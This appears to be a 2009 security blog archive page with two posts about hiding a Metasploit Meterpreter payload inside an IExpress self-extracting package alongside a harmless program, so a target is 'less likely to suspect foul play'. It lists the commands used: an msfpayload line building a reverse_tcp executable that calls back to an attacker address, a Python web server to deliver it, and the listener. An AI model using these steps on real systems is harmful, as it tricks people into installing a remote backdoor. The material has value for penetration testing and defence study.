Top
Search
Subscribe
Social Media - Mubix
Login
Archives

Entries in iexpress (2)

Monday
Mar092009

Metasploit <3s Microsoft

DateMonday, March 9, 2009 at 6:03PM

Update to post: Metasploit Heart's Microsoft

Ok, so many people had issues with the Vimeo video, that I posted it to youtube in hopes that you'll be able to play it all the way through. I still have no idea what the issue is, it's played perfectly on all the computers that I've tried it on.

AuthorRob Fuller | Comment4 Comments |
tagged , , , , , in
Monday
Mar022009

Metasploit heart's Microsoft

DateMonday, March 2, 2009 at 2:24PM

Hiding Meterpreter with IExpress from mubix on Vimeo.

Using the IExpress, a built in tool (XP, not sure about other Windows versions), we package two executables together, so that the target is less likely to suspect foul play. Now, I used calc.exe, but you can use anything on both sides of the coin. Use a better game so that it's easyier to dupe, or a different malicious executable (leekspin perhaps?).

I'll let your minds take this to the level I know you all are capable of. One caveat is that the icon for the executable is that of the self extractor, which shouldn't be that much of an issue to change, but I don't know off the top of my head of an app that does it, so please comment and let me know if you do.

Commands from video:

  • ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=1080 X > /tmp/academy/bob.exe

  • (For python 2.4+) python -m SimpleHTTPServer

  • (For python 2.3 -) python -c "from SimpleHTTPServer import test; test()"

  • Start -> Run -> iexpress <return>

  • Run multi/hander from command line (not shown in video)


Links from video:
AuthorRob Fuller | Comment10 Comments |
tagged , , , , , , in